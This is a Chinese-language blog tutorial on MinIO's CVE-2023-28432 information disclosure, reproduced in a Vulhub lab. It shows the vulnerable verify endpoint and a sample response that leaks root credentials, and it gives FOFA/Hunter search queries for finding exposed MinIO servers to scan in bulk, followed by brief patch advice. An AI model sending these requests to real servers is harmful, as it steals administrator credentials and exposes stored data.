当前位置：首页 > news >正文

MinIO集群模式信息泄露漏洞（CVE-2023-28432）

news 2026/4/1 17:06:10

前言：MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量，却拥有着不错的性能。它兼容亚马逊S3云存储服务接口，非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。

0x00 环境配置

此次实验，我们继续使用P神的Minio的docker环境。启动环境：

cd /vulhub-master/minio/CVE-2023-28432/
docker-compose up -d

启动完成后访问http://your-ip:9001为集群的web管理页面，另外http://your-ip:9000为集群的API接口。

0x01 触发漏洞

这个漏洞的节点存在于这个路径：http://your-ip:9000/minio/bootstrap/v1/verify
对该路径发送POST请求会返回一段JSON数据：

{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3,"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000","Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},{"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3","Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env","MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key","MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}

在该json字段中，我们可以看到MINIO_ROOT_USER字段包含账户名，MINIO_ROOT_PASSWORD字段包含账户的密码。所以该信息泄露其实就是API接口的信息泄露。我们可以根据这个特性，写一个批量的脚本文件来检测，并将其中的关键信息返回。

0x02 POC利用

先在FoFa或者鹰图上面收集跟MinIO集群相关的资产。
banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”
脚本相关较为敏感，若有需要可以加群下载。
其实脚本比较简单，就是向这个漏洞URL发送请求，判断返回包是否包含敏感字段。
如果包含就说明有敏感JSON字段，最后对这个JSON数据进行解析，拿出其中我们需要的两个字段即可。下图为利用效果。

0x03 加固建议

升级官方最新补丁可以修复该漏洞。

MinIO集群模式信息泄露漏洞（CVE-2023-28432）

0x00 环境配置

0x01 触发漏洞

0x02 POC利用

0x03 加固建议

相关文章：

MinIO集群模式信息泄露漏洞（CVE-2023-28432）

【从零单排Golang】第十五话：用sync.Once实现懒加载的用法和坑点

常见注意力机制

解决报错之org.aspectj.lang不存在

java之SpringBoot基础篇、前后端项目、MyBatisPlus、MySQL、vue、elementUi

golang中如何判断字符串是否包含另一字符串

ONNX OpenVino TensorRT MediaPipe NCNN Diffusers ComfyUI

java中使用 Integer 和 int 的含义、使用方法及之间的区别

点云从入门到精通技术详解100篇-点云的特征检测

DOM破坏绕过XSSfilter例题

代码随想录Day_56打卡

高忆管理：六连板捷荣技术或难扛“华为概念股”大旗

「解析」YOLOv5 classify分类模板

交换排序——冒泡排序、快速排序

Android 10.0 禁用adb shell input输入功能

cuda显存访问耗时

【HTML5高级第三篇】drag拖拽、音频视频、defer/async属性、dialog应用

独享IP vs. 共享IP：哪种更适合你？

【Arduino27】DHT11温湿度传感器模拟值实验

dockerfile基于apline将JDK20打包成镜像

告别大模型幻觉！RAG 原理 + Spring AI 代码实现一步到位

Java开发者指南：CV_UNet图像着色模型集成实战

Stable Yogi Leather-Dress-Collection效果展示：2.5D视角下皮衣动态褶皱与身体贴合度真实感

YimMenu：GTA5游戏体验增强工具全攻略

智能提取B站字幕：告别手动抄录的高效开源工具

2024电子数据取证实战：从手机取证到恶意APP逆向分析

华为OD生存指南：转正挑战、身份认知与职业适配

别再只盯着芯片手册了！用CC6902SO搭建电流检测电路，这些实测数据和避坑经验更重要

5分钟学会OrgChart：从零开始创建动态组织图

告别Bad Username or Password：手把手教你用MQTTX正确连接OneNET物联网开发平台（附Token生成避坑点）